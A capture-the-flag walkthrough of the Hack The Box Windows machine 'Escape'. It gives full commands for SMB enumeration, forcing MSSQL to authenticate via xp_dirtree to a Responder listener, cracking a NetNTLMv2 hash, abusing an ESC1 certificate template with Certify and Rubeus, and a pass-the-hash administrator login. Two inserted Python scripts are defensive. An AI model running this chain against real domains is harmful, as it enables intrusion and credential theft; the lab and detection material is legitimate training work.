Box: Escape

Platform: Hack The Box
OS: Windows
Platform Difficulty: Medium
User Difficulty: 4.6
My Difficulty Rating: User 4 / Root 5
Summary (Spoilers)
For the foothold, we first enumerate the target with nmap to discover open ports and services. An anonymously readable SMB share holds a PDF containing MSSQL credentials and an employee's email address. With these credentials we log into the MSSQL server and run a stored procedure that forces the SQL service account to authenticate to our machine, where Responder captures its NetNTLMv2 hash. Cracking this hash gives us access to the system as the sql_svc user. Further investigation leads us to a SQL Server log file revealing another user's credentials, allowing us to access the system as Ryan.Cooper.
For privilege escalation, we abuse a misconfigured certificate template in Active Directory Certificate Services (AD CS): with Certify.exe we request a certificate that carries the administrator user as its alternative name, then use Rubeus.exe to obtain a TGT and the administrator's NTLM hash, which grants us full control over the system.
Enumeration
The initial enumeration shows a lot of open ports, as is typical for Windows machines.
└─$ sudo nmap -Pn -p- 10.10.11.202
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-09 05:22 EST
Nmap scan report for sequel.htb (10.10.11.202)
Host is up (0.025s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49686/tcp open unknown
49727/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 106.94 seconds
Explanation: -Pn: Treats all hosts as online, skipping host discovery. -p-: Scans all 65535 ports.
Let’s take a look at the top ports and see what’s running on them.
└─$ sudo nmap -Pn -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389 -A 10.10.11.202
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-09 05:25 EST
Nmap scan report for sequel.htb (10.10.11.202)
Host is up (0.043s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-09 18:25:50Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
<...SNIP...>
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
<...SNIP...>
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-03-09T18:27:15+00:00; +7h59m59s from scanner time.
<...SNIP...>
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-09T18:27:15+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-03-09T18:27:15+00:00; +7h59m59s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Explanation: -A: Enables OS detection, version detection, script scanning, and traceroute. -p: Specifies which ports to scan.
With no website present, SMB is the logical starting point for our investigation.
└─$ smbclient -L \\10.10.11.202
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Explanation: Lists shares on the target machine.
We find an accessible file share and connect to it. We find a PDF and download it to our machine for further examination.
└─$ smbclient \\10.10.11.202\Public --no-pass
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1438517 blocks available
smb: > get "SQL Server Procedures.pdf"
getting file SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (293.3 KiloBytes/sec) (average 293.3 KiloBytes/sec)
Explanation: Connects to the Public share on the target machine without using a password.
When we open the file, we see some information about the setup procedures for an SQL Server. We find some interesting information on page 2.

So we have our first credentials that should be valid for MSSQL: PublicUser:GuestUserCantWrite1
In addition, there is a link in the document that reveals an employee’s email address: mailto:brandon.brown@sequel.htb
We have some hostnames from the email address and the Nmap scan, so we add them to the /etc/hosts file.
10.10.11.202 sequel.htb dc.sequel.htb sequel
Foothold
We have credentials, and an MSSQL server appears to be running on port 1433. So let’s try logging in as PublicUser.
└─$ mssqlclient.py sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DCSQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DCSQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL>
Explanation: Logs into the MSSQL server using the provided credentials.
The login attempt was successful. Some attempts to elevate privileges or find useful information are unsuccessful. But with SMB and SQL present on a Windows machine, we always have to think about coercing the SQL service account into an SMB authentication to our box and capturing its NetNTLMv2 hash.
So let’s prepare and execute this attack.
# On the attack box
└─$ sudo responder -I tun0
Explanation: Starts the Responder tool on the attack box to capture NTLM hashes.
# On the victim machine
SQL> xp_dirtree '\\10.10.16.7\anything'
Explanation: Triggers an SMB request from the victim machine to our attack box, capturing an NTLM hash.
It works and we get the hash of the sql_svc user in the responder.
[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:980c25461d8a650a:60825E7C6F321C087C2E786BC112A0D1:010100000000000000D1B88DE571DA0149D4520D6E99D5BD0000000002000800470035004300370001001E00570049004E002D005A004900470057005700530042004D0034004B00430004003400570049004E002D005A004900470057005700530042004D0034004B0043002E0047003500430037002E004C004F00430041004C000300140047003500430037002E004C004F00430041004C000500140047003500430037002E004C004F00430041004C000700080000D1B88DE571DA0106000400020000000800300030000000000000000000000000300000C31FE7717C411A623DE269BCC7D6B5842BF6AA6621D822A505CE42DF9CA061D40A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0037000000000000000000
We copy the hash to a file named hash and crack it with hashcat.
└─$ hashcat hash /usr/share/wordlists/rockyou.txt -m 5600
hashcat (v6.2.6) starting
<...SNIP...>
SQL_SVC::sequel:7c126225e088479b:bebc725dabaf15a139ac431c7702fdc5:<...SNIP...>:REGGIE1234ronnie
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
<...SNIP...>
Explanation: Uses hashcat to crack the NetNTLMv2 hash using the rockyou.txt wordlist.
Since port 5985 is open, we try to log in with WinRM. This succeeds and we have a foothold on the victim machine. Since there is no flag in the Desktop folder, we need to escalate our privileges to another user.
└─$ evil-winrm -i 10.10.11.202 -u sql_svc -p 'REGGIE1234ronnie'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents>
Explanation: Logs into the victim machine using WinRM with the credentials obtained from cracking the NTLM hash.
User
We have access to a SQL log file in the SQLServer folder.
*Evil-WinRM* PS C:\SQLServer\Logs> dir
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
Let's take a closer look at it.
*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK
<...SNIP...>
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
<...SNIP...>
There appears to have been an unsuccessful logon attempt by the user Ryan.Cooper, followed 40 milliseconds later by a failed logon for the "user" NuclearMosquito3 from the same client. Judging by the information in the file, we can assume that the user accidentally entered his password in the user field. So we can try the credential pair Ryan.Cooper:NuclearMosquito3.
We successfully log into the victim machine and find the user.txt flag on Ryan.Cooper's desktop.
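The pattern in ERRORLOG.BAK (a real account fails to log on, and moments later a "user name" that is not an account fails from the same client) is detectable without a human reading the log. The script below is an added example, not code from the original post; it runs over constructed log lines mirroring the entries above, flags values that do not look like principals, pairs each one with the real account that failed just before it, and redacts the suspected secret before the log leaves the host.

```python
"""Spot passwords typed into the user-name field of failed SQL Server logons
(added example; not from the original post)."""
import re
from datetime import datetime

# Constructed sample mirroring the ERRORLOG.BAK entries shown above, plus one
# ordinary failure for the built-in 'sa' login from another client.
SAMPLE_ERRORLOG = """\
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:45:10.10 Logon       Logon failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
"""

# Error 18456 "Logon failed for user" lines; the Error/Severity/State lines are ignored.
LOGON_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]"
)


def is_plausible_login(name: str, known_logins: set) -> bool:
    """DOMAIN\\user, user@domain and known SQL logins are treated as real principals."""
    known = {k.lower() for k in known_logins}
    return "\\" in name or "@" in name or name.lower() in known


def find_leaked_secrets(log_text: str, known_logins: set, window_s: float = 5.0) -> list:
    """Return failed-logon 'user names' that look like a secret typed into the wrong field."""
    events = []
    for line in log_text.splitlines():
        m = LOGON_FAILED.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["user"], m["client"]))
    findings = []
    for i, (ts, user, client) in enumerate(events):
        if is_plausible_login(user, known_logins):
            continue
        # A real account failing from the same client moments earlier is the likely owner.
        owners = [u for t, u, c in events[:i]
                  if c == client and 0 <= (ts - t).total_seconds() <= window_s
                  and is_plausible_login(u, known_logins)]
        findings.append({"timestamp": ts, "client": client, "suspect_value": user,
                         "probable_account": owners[-1] if owners else None})
    return findings


def redact(log_text: str, findings: list) -> str:
    """Mask the suspected secrets before the log is shared or shipped to a SIEM."""
    for f in findings:
        log_text = log_text.replace(f"'{f['suspect_value']}'", "'<REDACTED>'")
    return log_text


if __name__ == "__main__":
    hits = find_leaked_secrets(SAMPLE_ERRORLOG, known_logins={"sa", "PublicUser"})
    for h in hits:
        print(f"{h['timestamp']} client={h['client']} value={h['suspect_value']!r} "
              f"probably belongs to {h['probable_account']!r}")
    print(redact(SAMPLE_ERRORLOG, hits))
```

A finding should trigger a password reset for the probable account: the secret is already on disk in a file that, as this box shows, is readable by the SQL service account and by anyone who lands on the host with it.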
└─$ evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p 'NuclearMosquito3'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> dir ..\Desktop
Directory: C:\Users\Ryan.Cooper\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/9/2024 10:21 AM 34 user.txt
Explanation: Logs into the victim machine using WinRM with Ryan.Cooper's credentials.
Privilege Escalation
After some time with no progress, we see if we can exploit the Active Directory Certificate Services (AD CS).
└─$ crackmapexec ldap 10.10.11.202 -d sequel.htb -u Ryan.Cooper -p 'NuclearMosquito3' -M adcs
SMB 10.10.11.202 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.11.202 636 DC [+] sequel.htb\Ryan.Cooper:NuclearMosquito3
ADCS 10.10.11.202 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS Found PKI Enrollment Server: dc.sequel.htb
ADCS Found CN: sequel-DC-CA
Explanation: Uses CrackMapExec to check for AD CS enrollment services using Ryan.Cooper's credentials.
The services are installed and there are a number of different attack vectors. We decide to follow HackTricks and use the tool Certify.exe, which we upload to the victim machine using the upload feature of Evil-WinRM.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload Certify.exe
Info: Uploading /home/kali/Downloads/escape/Certify.exe to C:\Users\Ryan.Cooper\Documents\Certify.exe
Data: 232104 bytes of 232104 bytes copied
Info: Upload successful!
We start by checking the ESC1 attack path, looking for vulnerable certificate templates.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Certify.exe find /vulnerable
<...SNIP...>
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
<...SNIP...>
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
<...SNIP...>
The UserAuthentication template is vulnerable: any Domain User can enroll, the enrollee supplies the subject (and so the alternative name), the certificate is valid for Client Authentication, and no approval or signature is required. So we request a certificate that names the administrator user as its alternative name.
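The Certify listing above contains every fact needed to decide whether a template is ESC1-exposed, and the same check is what an AD CS audit should run over all published templates. The script below is an added example, not code from the original post or from Certify; it parses a constructed copy of the listing above, evaluates the five ESC1 preconditions, and shows that removing ENROLLEE_SUPPLIES_SUBJECT or requiring CA manager approval (PEND_ALL_REQUESTS) each closes the path. The principal and EKU lists are my assumptions about what counts as low-privileged and as logon-capable.

```python
"""Evaluate a Certify template listing for the ESC1 preconditions
(added example; not the original post's or Certify's own code)."""
import re

# Constructed from the Certify output shown above; column alignment is not significant.
CERTIFY_TEMPLATE = r"""
    CA Name                               : dc.sequel.htb\sequel-DC-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    msPKI-Certificate-Name-Flag           : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
"""

# Assumption: groups every domain member belongs to count as low-privileged enrollers.
LOW_PRIV_PRINCIPALS = {"domain users", "authenticated users", "everyone", "domain computers"}
# Assumption: EKUs that make the issued certificate usable for PKINIT / client logon.
AUTH_EKUS = {"client authentication", "smart card logon", "pkinit client authentication", "any purpose"}


def parse_certify_template(text: str) -> dict:
    """Turn the 'Key : Value' block into a dict; Enrollment Rights keeps its continuation lines."""
    tmpl, last_key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        key, sep, value = line.partition(":")
        if sep:
            last_key = key.strip().lower()
            tmpl[last_key] = [value.strip()]
        elif last_key == "enrollment rights":      # continuation line of the rights list
            tmpl[last_key].append(line)
    return {k: v if k == "enrollment rights" else v[0] for k, v in tmpl.items()}


def principal_name(rights_entry: str) -> str:
    """'sequel\\Domain Users   S-1-5-...-513' -> 'domain users'."""
    name = re.split(r"\s+S-1-", rights_entry)[0].strip()
    return name.split("\\")[-1].lower()


def esc1_findings(tmpl: dict) -> list:
    """Return the reasons the template meets every ESC1 precondition, or [] if any one fails."""
    name_flags = tmpl.get("mspki-certificate-name-flag", "").upper()
    enroll_flags = tmpl.get("mspki-enrollment-flag", "").upper()
    ekus = {e.strip().lower() for e in tmpl.get("pkiextendedkeyusage", "").split(",") if e.strip()}
    signatures = int(tmpl.get("authorized signatures required", "0") or 0)
    low_priv = sorted({principal_name(e) for e in tmpl.get("enrollment rights", [])} & LOW_PRIV_PRINCIPALS)
    checks = [
        ("ENROLLEE_SUPPLIES_SUBJECT" in name_flags,
         "requester controls the subject and SAN (ENROLLEE_SUPPLIES_SUBJECT)"),
        (not ekus or bool(ekus & AUTH_EKUS),
         f"certificate usable for logon: {sorted(ekus & AUTH_EKUS) or 'no EKU restriction'}"),
        (signatures == 0, "no authorized signature required"),
        ("PEND_ALL_REQUESTS" not in enroll_flags, "no CA manager approval (PEND_ALL_REQUESTS unset)"),
        (bool(low_priv), f"low-privileged enrollers: {low_priv}"),
    ]
    return [reason for ok, reason in checks] if all(ok for ok, _ in checks) else []


def harden(tmpl: dict) -> dict:
    """Template-level fixes: build the subject from AD and require manager approval."""
    fixed = dict(tmpl)
    fixed["mspki-certificate-name-flag"] = "SUBJECT_ALT_REQUIRE_UPN"
    fixed["mspki-enrollment-flag"] = tmpl.get("mspki-enrollment-flag", "") + ", PEND_ALL_REQUESTS"
    return fixed


if __name__ == "__main__":
    template = parse_certify_template(CERTIFY_TEMPLATE)
    for reason in esc1_findings(template) or ["not ESC1-exposed"]:
        print(f"{template['template name']}: {reason}")
    print("after hardening:", esc1_findings(harden(template)) or "not ESC1-exposed")
```

Either fix alone is enough to break the chain used on this box; in the Certificate Templates console they correspond to "Build from this Active Directory information" on the Subject Name tab and "CA certificate manager approval" under Issuance Requirements.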
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator
<...SNIP...>
v1.0.0
[*] Action: Request a Certificates
[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : administrator
[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 13
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAyRfyynpE3c57zWJIm/R6N2wdwb9xUrJWt9iblw3q/kQDGA0v
<...SNIP...>
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAA3KpZGcp3kfogAAAAAADTANBgkqhkiG9w0BAQsF
<...SNIP...>
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:13.3978108
We save the certificate in a file named cert.pem (from the beginning of the RSA key to the end of the certificate) and convert it to a .pfx file.
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
Explanation: Converts the certificate and its private key from PEM format to PFX (PKCS#12) format for use with Windows authentication mechanisms.
We upload the cert.pfx file to the victim machine using Evil-WinRM.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload cert.pfx
Info: Uploading /home/kali/Downloads/escape/cert.pfx to C:\Users\Ryan.Cooper\Documents\cert.pfx
Data: 4564 bytes of 4564 bytes copied
Info: Upload successful!
We also need the Rubeus.exe tool on the box for the next step.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload Rubeus.exe
Info: Uploading /home/kali/Downloads/escape/Rubeus.exe to C:\Users\Ryan.Cooper\Documents\Rubeus.exe
Data: 595968 bytes of 595968 bytes copied
Info: Upload successful!
Now we can use the certificate to request a TGT as administrator and, from it, recover the administrator's NTLM hash.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password:'' /getcredentials
<...SNIP...>
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::19df:ff75:b20:ede8%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGSDCCBkSgAwIBBaEDAgEWooIFXjCCBVphggVWMIIFUqADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
<...SNIP...>
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE
Explanation: Uses Rubeus to request a Ticket-Granting Ticket (TGT) for the user "administrator" via PKINIT, authenticating with cert.pfx (empty export password), and then tries to retrieve the NTLM credential associated with that user through a U2U request.
And with the NTLM hash, we can now authenticate from the attack box as administrator. We have access to the root.txt file and have successfully rooted the box.
└─$ evil-winrm -i 10.10.11.202 -u administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ..\Desktop
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/9/2024 10:21 AM 34 root.txt
Explanation: Logs into the victim machine as administrator using WinRM with NTLM hash authentication.
Final Thoughts
I believe the box falls into the easier spectrum of medium difficulty. It presents some typical attack vectors for Windows systems. Initially, breaching Windows may appear more complex compared to Linux. However, as one gains experience, attacking Windows systems becomes quite enjoyable.
Featured Image: DALL-E 3
